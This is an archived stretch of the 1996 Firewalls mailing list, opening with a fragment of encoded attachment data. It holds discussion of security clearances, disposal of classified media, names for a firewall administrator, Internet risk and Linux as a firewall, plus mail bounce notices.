M+>$8T"N0A9%48K]>DH8P,<%.\!&PH-%4+@'?`A"6T 0@+<5DD`$9/4T7>0YB8*C.=41& < 0@51&_*D [02T03E-XT24P00) M0&XN.B!6,B42.7\R%-,9 -L"4P340_L'0P-QL0 M+3<@'-"EY4?\4$\Q<65 7_1&4:^%`)#O&]!E43)2>&%SE* $]"NR_BA-85>! MN# 'D0M0IH&Y$O^X,'?@5;"/Q$AQ!T $(+LAYP`@!)!E4"D[*C%E0"WB&TZ M7M$H`=!$D34Q,N<=(!S!K/TM/;[OOW6M=HQU9''0+?!,34"6LW!E0S(NA@&" M%1?Q``'#`````$ `.0``0*7LPN"Z`0(!1P`!````,P```&,]55,[83T@.W ] M4V5C=7)E0S([;#U0`#T``0````4```!213H@``````(!%#0! 9````$ ```%24H< I?Q ;I8<(`"LJ)1; Fri, 12 Jan 1996 00:29:31 -0800 (PST) From: mulligan@future.incog.com Received: from future.incog.com by incog.com (SMI-8.6/94082501) id AAA21785; Fri, 12 Jan 1996 00:26:35 -0800 Received: from future by future.incog.com (SMI-8.6/SMI-SVR4) id BAA16461; Fri, 12 Jan 1996 01:28:27 -0700 Message-Id: <199601120828.BAA16461@future.incog.com> To: Kent Dahlgren cc: Brett Lymn , Brain21 , firewalls@greatcircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Reply-to: mulligan@incog.com In-reply-to: Your message of "Thu, 11 Jan 1996 07:30:42 PST." Date: Fri, 12 Jan 1996 01:28:26 -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kent Dahlgren wrote: > > According to Brain21: > > > > > >Hell, my father used > > >to do top secret work for the Dept. of Defense (he neede "Q" clearance, > > >and needs higher now) and the office where he worked communicated to it's > > >other offices over the net. They used netcom. Not too terribly secure > > >if you ask me. They did not use encryption. > > [Brett Lymn's response removed] > I hold a TS SCI clearance with the Air Force. I've been in for almost 10 > years, and I've never heard of a "Q" clearance. Not to say there isn't > any such thing; I don't pretend to know everything. A "Q" clearance is a Department of Energy clearance and NOT a DOD clearance. geoff From firewalls-owner Fri Jan 12 04:44:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA14676 for firewalls-outgoing; Fri, 12 Jan 1996 04:35:51 -0800 (PST) Received: from balder.ssds.com (balder.ssds.com [204.131.72.62]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA14671 for ; Fri, 12 Jan 1996 04:35:47 -0800 (PST) Received: (from mail@localhost) by balder.ssds.com (8.6.9/8.6.9.SSDSnet-hub) id FAA27111; Fri, 12 Jan 1996 05:34:49 -0700 Received: from denver(134.127.16.1) by balder via smap (V1.3) id sma027109; Fri Jan 12 05:34:41 1996 Received: from baltimore.ssds.com (baltimore.ssds.com [134.127.34.1]) by denver.ssds.com (8.6.9/8.6.9.SSDSnet-hub) with ESMTP id FAA28687; Fri, 12 Jan 1996 05:34:39 -0700 Received: (from mam@localhost) by baltimore.ssds.com (8.6.9/8.6.9.SSDSnet-site) id HAA28755; Fri, 12 Jan 1996 07:34:37 -0500 Date: Fri, 12 Jan 1996 07:34:36 -0500 (EST) From: Mike Malik -- Dover DE X-Sender: mam@baltimore To: "Marcus J. Ranum" cc: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #16 In-Reply-To: <199601111500.KAA12166@switchblade.v-one.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Amen ! ( ( | ( Mike Malik (mam@ssds.com) ) ) (| ), inc. 9841 Broken Land Parkway,Suite 100 business driven Columbia, MD 21046 technology solutions 410-381-4313 FAX: 410-381-2170 From firewalls-owner Fri Jan 12 04:59:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA14885 for firewalls-outgoing; Fri, 12 Jan 1996 04:51:24 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA14880 for ; Fri, 12 Jan 1996 04:51:20 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id HAA11753; Fri, 12 Jan 1996 07:50:21 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id HAA00995; Fri, 12 Jan 1996 07:50:19 -0500 (EST) Date: Fri, 12 Jan 1996 07:50:19 -0500 (EST) From: "Paul D. Robertson" To: Bill Curr cc: firewalls@greatcircle.com Subject: Re: "Title for Firewall Admin? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Bill Curr wrote: > The mail administrator is "postmaster" This is covered in the SMTP RFC, and is a *requirement* of correctly implemented SMTP. > The web server admin is "webmaster" That's because the little weenies were jealous that postmasters got more than one ID. :P > Is there such a title for a firewall administrator? I think gatekeeper is in fairly widespread use, though most don't alias it at their mailhost, which I think would be helpful, given the lack of consistancy in the INTERNIC WHOIS database. Internally, the firewall admins are known by much more colorful terms by their happy little Real Audio seeking users ;) > And is there a list of these colorful "nom de nets" anywhere? > -Thanks > Bill > Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Fri Jan 12 05:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA15196 for firewalls-outgoing; Fri, 12 Jan 1996 05:02:53 -0800 (PST) Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA15189 for ; Fri, 12 Jan 1996 05:02:48 -0800 (PST) Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma000901; Fri Jan 12 08:01:45 1996 Posted-Date: Fri, 12 Jan 1996 08:01:44 -0500 From: "Bryan D. Boyle" Message-Id: <9601120801.ZM8948@maverick.erenj.com> Date: Fri, 12 Jan 1996 08:01:43 -0500 In-Reply-To: "Marcus J. Ranum" "Re: Firewalls-Digest V5 #16" (Jan 11, 10:00am) References: <199601111500.KAA12166@switchblade.v-one.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: firewalls@greatcircle.com Subject: Re: Firewalls-Digest V5 #16 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Jan 11, 10:00am, Marcus J. Ranum wrote: ******DELETIA******** > I suspect, but I don't know, that Tsutomu would probably > say something similar. The game of securing systems is correctly > balancing risks against technical responses to risk. If you can > convince yourself the risks are low, then the technical responses > required are also low. > > If you don't take the time to figure out what's at stake > you can't produce a measured, appropriate response. Truer words ne'er were passed on this list. We spend so much time in the administrivia of 'mine is {bigger|faster|better} than yours' than we do in the 'what is the risk of providing a service, what is the analysis of the threat, and what is the level of security that we can live with to provide our customers (remember them???) a reasonable service in an auditable manner..." If you don't know what the objective is, it is pretty hard to design a system to help you get there. Just my $.02 -- Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 #include | http://www.access.digex.net/~bdboyle/index.html "It is only the ignorant who suppose themselves omniscient." --General Robert Edward Lee-- From firewalls-owner Fri Jan 12 05:29:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA15223 for firewalls-outgoing; Fri, 12 Jan 1996 05:05:04 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA15218 for ; Fri, 12 Jan 1996 05:05:01 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id IAA12791; Fri, 12 Jan 1996 08:04:00 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id IAA03067; Fri, 12 Jan 1996 08:03:59 -0500 (EST) Date: Fri, 12 Jan 1996 08:03:58 -0500 (EST) From: "Paul D. Robertson" To: Brett Lymn cc: Benjamin Allan Smith , firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <9601120720.AA19380@bunya.awadi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Brett Lymn wrote: > According to Benjamin Allan Smith: > > > > If memory serves, megnetic media that have had Secret data on them > >may be declassified after 10 writes. Magnetic media with Top Secret and > >higher may never be declassified and must be destroyed by phyiscally > >destroying the media (shreading) and incinerating the pieces. > > > > if there was a firewalls FAQ this one should definitely be > in it. There is a FAQ, and I for one don't understand why Marcus hasn't gotten around to folklore, legends and stuff, what's he doing, working for a living? Sheesh ;) > > The correct answer is, apparently, it depends. It seems in the US > that the the DOD will allow the defence organisations to declassify > and dispose of disks which have had data lower than a certain level > stored on them (I think Secret is about right). The rules for a Secret, and it's "used to allow" according to a couple of old acquaintances. > Defence contractor are different - any media with any sort of > classified data on it must be destroyed after it is no longer > required. > > Here in Australia, I know for sure that it is the same for defence > contractors - I am the ISSO so I am supposed to know about such > things... > > > > (Ironically I was able to easily find "Destruction of Equipment [Land > >Rover] to Prevent Enemy Use" which is USER HANDBOOK, Truck, Utility, 3/4 Ton, > >4 X 4 (Military 109) Pub. 3/82, Section V, Par 402 to 411) :) > > I'd consider an attempt at destroying a Land Rover to be a fairly significant feat without pyrotechnics or HE. > > I saw a section about changing the tyre on a military vehicle, the > amount of detail and instruction in it was very very disturbing.... > Written for the lowest common denominator. The old M-16 maintenance *comic book* was always a personal favorite of how far down one could stoop denominator-wise. Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Fri Jan 12 06:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA17120 for firewalls-outgoing; Fri, 12 Jan 1996 06:05:51 -0800 (PST) Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA17115 for ; Fri, 12 Jan 1996 06:05:36 -0800 (PST) Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.7.3/8.6.9) with SMTP id OAA28176 for ; Fri, 12 Jan 1996 14:04:13 GMT Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id KAA17042 for ; Fri, 12 Jan 1996 10:11:23 GMT From: Danny Cox Date: Fri, 12 Jan 1996 10:10:16 GMT Message-Id: <9256.9601121010@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: Insecurity of Internet connections X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt: > I highly doubt that. Every machine that I have seen on base which has >Secret (or higher) data is not allowed to have *any* physical connection with >the internet (the mjr 100% sure firewall to the internet--cut the wires). This left me musing. The overall purpose of building firewalls between our internal networks and the Internet (or any other network) is to secure ourselves from compromise as best we can. There is a lot of twitchiness around about allowing Internet connections and I suspect that's in part simply driven by the media, who pick up cheerfully on stories of succesfully compromised systems whether due to poor administration or bad initial configuration or weak security software or whatever. What I'm trying to get a feel for, and I'm struggling a little, is to what extent we can secure ourselves in the ideal world. When I hear people say that the Internet is insecure, and connecting to the Internet is an enormous security risk, I squirm. If, as an absolute statement, those are true, then maybe we're wasting time here anyway. Assuming it's not, then what level of assurance can we offer to a non-techie sort of person. Does anyone have numbers to indicate what attacks are successful - a sort of top ten if you would? When the military refuse connections to the Internet - are they absolutely right because the Internet is insecure, or simply covering their backs (understandably) in case of something going amiss, which isn't known about currently ? They must achieve some sort of risk analysis in order to decide what's underlying network topology is okay and what isn't, I assume. Anyone give some insight as to how this is done ? I don't feel that my words ask my question very precisely, but hopefully they might allow a bit of reading between lines to show what I'm getting at! Thanks for your thoughts, Danny From firewalls-owner Fri Jan 12 06:44:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA17929 for firewalls-outgoing; Fri, 12 Jan 1996 06:38:00 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA17915 for ; Fri, 12 Jan 1996 06:37:53 -0800 (PST) Received: by gauntlet-1.trusted.com; id JAA24204; Fri, 12 Jan 1996 09:39:36 -0500 Received: from vanidor.tis.com(192.94.214.98) by gauntlet-1.trusted.com via smap (T3.1) id xma024199; Fri, 12 Jan 96 09:39:10 -0500 Message-Id: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> X-Sender: avolio@gauntlet-1.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 12 Jan 1996 09:31:21 -0500 To: billcurr@cyberspace.com (Bill Curr), firewalls@GreatCircle.COM From: Frederick M Avolio Subject: Re: "Title for Firewall Admin? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On the Gauntlet Firewalls that we install, the management accounts of the firewall machine go to the firewall manager. But I can see, eventually, a need for a well known different term. Gee, another thing for the Firewall Product Developers Consortium to talk about. :-) Quick... get famous. Suggest a standard! "gatekeeper" is a fun possibility. "doorman" is too plain. Fred At 04:04 PM 1/11/96 -0800, Bill Curr wrote: > >The mail administrator is "postmaster" >The web server admin is "webmaster" >Is there such a title for a firewall administrator? >And is there a list of these colorful "nom de nets" anywhere? >-Thanks >Bill > > From firewalls-owner Fri Jan 12 07:29:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19544 for firewalls-outgoing; Fri, 12 Jan 1996 07:27:08 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19536 for ; Fri, 12 Jan 1996 07:26:58 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 675524100096012FPHSSEA; 12 Jan 1996 10:24:10 EST Message-Id: Date: 12 Jan 1996 10:24:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:22:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #21" sent on 1/12/96 1:01AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 07:53:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19680 for firewalls-outgoing; Fri, 12 Jan 1996 07:30:24 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19641 for ; Fri, 12 Jan 1996 07:30:06 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 210228100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:25:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #22" sent on 1/12/96 4:06AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 07:59:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19678 for firewalls-outgoing; Fri, 12 Jan 1996 07:30:22 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19644 for ; Fri, 12 Jan 1996 07:30:06 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 431328100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:25:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #22" sent on 1/12/96 4:06AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 08:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21346 for firewalls-outgoing; Fri, 12 Jan 1996 08:11:49 -0800 (PST) Received: from omega.IntraNet.com (omega.IntraNet.com [192.148.106.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21309 for ; Fri, 12 Jan 1996 08:11:39 -0800 (PST) Received: by omega.IntraNet.com; (5.65/1.1.8.3/20May95-0100AM) id AA21611; Fri, 12 Jan 1996 11:17:21 -0500 Received: by giant.IntraNet.com (DECUS UUCP /2.0/2.0/2.0/); Fri, 12 Jan 96 11:02:44 EST Date: Fri, 12 Jan 96 11:02:44 EST Message-Id: <0099C465F6823600.4060064A@giant.IntraNet.com> From: "G. Del Merritt" Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura To: Firewalls@GreatCircle.COM X-Vms-Mail-To: uucp%"Firewalls@GreatCircle.COM" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In-response-to: 's message of 11 Jan 1996 07:30:42 >On Thu, 11 Jan 1996, Brett Lymn wrote: >> According to Brain21: >> >Hell, my father used >> >to do top secret work for the Dept. of Defense (he neede "Q" clearance, >> >and needs higher now) and the office where he worked communicated to it's >> : >> Ummmm I suspect that things may be a bit different to that which you > : >I hold a TS SCI clearance with the Air Force. I've been in for almost 10 >years, and I've never heard of a "Q" clearance. Not to say there isn't >any such thing; I don't pretend to know everything. But classified traffic One of the points of SCI is that it is based on need to know. If you don't need to know about "Q", then you won't necessarily even know that it exists. And this is what you are told in the briefing process. So Cool. Now the world knows more about you all. This shows quite well that firewalls cannot contain sensitive information; only people can. Firewalls can at best just impede the flow. A story, perhaps legend, passed on to me by my security officer when I was still a part of the MIC: Fellow who has long been waiting for his clearance walks into the local bar, sees his buddies, and hollers, "I'm SECRET, I'm SECRET!". Next day he wasn't. -- Del Merritt del@IntraNet.com IntraNet, Inc., One Gateway Center #700, Newton, MA 02158 Voice: 617-527-7020; FAX: 617-527-6779 Just say no to Clipper. Want to buy my house or car? email me for details! From firewalls-owner Fri Jan 12 08:29:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21589 for firewalls-outgoing; Fri, 12 Jan 1996 08:17:37 -0800 (PST) Received: from nav.cc.tx.us (nav.cc.tx.us [192.152.226.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21584 for ; Fri, 12 Jan 1996 08:17:31 -0800 (PST) Received: by nav.cc.tx.us (AIX 3.2/UCB 5.64/4.03) id AA61778; Fri, 12 Jan 1996 10:20:14 -0600 Date: Fri, 12 Jan 1996 10:20:14 -0600 (CST) From: Dana Brewer To: firewalls@greatcircle.com Subject: Linux as a firewall Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've noticed that a lot of people say they use Linux as part of their Internet firewall. But now I've had a company tell me that Linux isn't a true multi-tasking operating system, so it shouldn't be used as a firewall. What's the true story here? Ideally, in our situation, the bastion host would be the firewall, the WWW server, the ftp server, the Usenet news server, etc... Is this completely unrealistic? ************************************************************************** Dana Brewer Director, Computer Center Internet: dana@nav.cc.tx.us Navarro College Phone : 903-874-6501 3200 W. 7th Ave. FAX : 903-874-4636 Corsicana, TX 75110 All opinions stated are my own, and probably don't even vaguely resemble those of Navarro College. :) ************************************************************************** From firewalls-owner Fri Jan 12 08:38:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19702 for firewalls-outgoing; Fri, 12 Jan 1996 07:31:14 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19686 for ; Fri, 12 Jan 1996 07:30:56 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 064128100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:26:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #17" sent on 1/12/96 8:52AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 08:44:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21038 for firewalls-outgoing; Fri, 12 Jan 1996 08:05:51 -0800 (PST) Received: from freebsd.netcom.com (freebsd.netcom.com [198.211.79.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21005 for ; Fri, 12 Jan 1996 08:05:44 -0800 (PST) Received: by freebsd.netcom.com (8.6.12/SMI-4.1) id KAA03301; Fri, 12 Jan 1996 10:10:43 -0600 From: bugs@freebsd.netcom.com (Mark Hittinger) Message-Id: <199601121610.KAA03301@freebsd.netcom.com> Subject: Re: "Title for Firewall Admin? (fwd) To: firewalls@greatcircle.com Date: Fri, 12 Jan 1996 10:10:43 -0600 (CST) X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Frederick M Avolio > But I can see, eventually, a need for a well known different term. > Gee, another thing for the Firewall Product Developers Consortium to talk > about. :-) Quick... get famous. Suggest a standard! > "gatekeeper" is a fun possibility. "doorman" is too plain. How about bouncer? Cheers! Mark Hittinger Netcom/Dallas bugs@freebsd.netcom.com msh@freebsd.org From firewalls-owner Fri Jan 12 08:59:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA22034 for firewalls-outgoing; Fri, 12 Jan 1996 08:35:47 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA22029 for ; Fri, 12 Jan 1996 08:35:43 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id KAA05344 for GreatCircle.COM!firewalls; Fri, 12 Jan 1996 10:12:21 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA25569; 12 Jan 96 10:39:33 CST (Fri) Received: by sonic.nmti.com; id AA00409; Fri, 12 Jan 1996 10:10:50 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601121610.AA00409@sonic.nmti.com.nmti.com> Subject: Re: "Title for Firewall Admin? To: billcurr@cyberspace.com (Bill Curr) Date: Fri, 12 Jan 1996 10:10:49 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Bill Curr" at Jan 11, 96 04:04:55 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? "masochist"? (remember... down, not across) From firewalls-owner Fri Jan 12 09:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA22079 for firewalls-outgoing; Fri, 12 Jan 1996 08:36:56 -0800 (PST) Received: from smtpgate.saa-cons.co.uk (haddock.demon.co.uk [158.152.16.191]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA22074 for ; Fri, 12 Jan 1996 08:36:48 -0800 (PST) Received: from haddock.saa-cons.co.uk by smtpgate.saa-cons.co.uk with SMTP (5.65/1.3-eef) id AA17681; Fri, 12 Jan 96 15:52:30 GMT Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) id AA54191; Fri, 12 Jan 1996 15:52:29 GMT Date: Fri, 12 Jan 1996 15:52:28 +0000 (GMT) From: Dave Roberts To: firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Frederick M Avolio wrote: > Gee, another thing for the Firewall Product Developers Consortium to talk > about. :-) Quick... get famous. Suggest a standard! > > "gatekeeper" is a fun possibility. "doorman" is too plain. firechief ? Why not continue the analogy, as bad as it may be :) Actually, I think Brent's suggestion was the best one so far. - Dave. From firewalls-owner Fri Jan 12 09:29:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21767 for firewalls-outgoing; Fri, 12 Jan 1996 08:24:05 -0800 (PST) Received: from ceddec.ceddec.com (clk-pm1-13.dialup.coast.net [205.149.142.113]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21758 for ; Fri, 12 Jan 1996 08:23:57 -0800 (PST) Received: (from shutdown@localhost) by ceddec.ceddec.com (8.6.12/8.6.9) id LAA06272; Fri, 12 Jan 1996 11:24:41 -0500 Received: from deimos(206.197.55.7) by ceddec via smap (V1.3) id sma006270; Fri Jan 12 11:24:38 1996 Received: (from root@localhost) by deimos.ceddec.com (8.6.10/8.6.9) id LAA00156; Fri, 12 Jan 1996 11:22:51 -0500 Date: Fri, 12 Jan 1996 11:22:51 -0500 (EST) From: Tom Zerucha Reply-To: zerucha@shell.portal.com To: Bill Curr cc: firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Bill Curr wrote: > > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? > And is there a list of these colorful "nom de nets" anywhere? > -Thanks > Bill > > castelian zerucha@shell.portal.com finger zerucha@jobe.portal.com for PGP key From firewalls-owner Fri Jan 12 09:33:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19701 for firewalls-outgoing; Fri, 12 Jan 1996 07:31:11 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19687 for ; Fri, 12 Jan 1996 07:30:56 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 462528100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:25:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #18" sent on 1/12/96 4:43AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 09:53:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA20874 for firewalls-outgoing; Fri, 12 Jan 1996 08:02:12 -0800 (PST) Received: from NYXGATE1.btco.com ([198.83.51.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA20854 for ; Fri, 12 Jan 1996 08:02:00 -0800 (PST) Received: (from mailer@localhost) by NYXGATE1.btco.com (8.7.1/8.6.9) id KAA12634; Fri, 12 Jan 1996 10:45:23 -0500 (EST) X-Authentication-Warning: NYXGATE1.btco.com: mailer set sender to using -f Received: from lncsex0003.eu.btco.com(160.82.152.218) by NYXGATE1.btco.com via smap (V1.3) id sma011414; Fri Jan 12 10:45:15 1996 Received: from lncsew0018p.eu.btco.com (lncsew0001.eu.btco.com [160.82.128.132]) by LNCSEX0003.eu.btco.com (8.7.1/BTmail) with SMTP id PAA00143; Fri, 12 Jan 1996 15:42:25 GMT Date: Fri, 12 Jan 1996 15:42:15 -0800 (PST) From: "Todd S. Aven" To: firewalls@greatcircle.com, 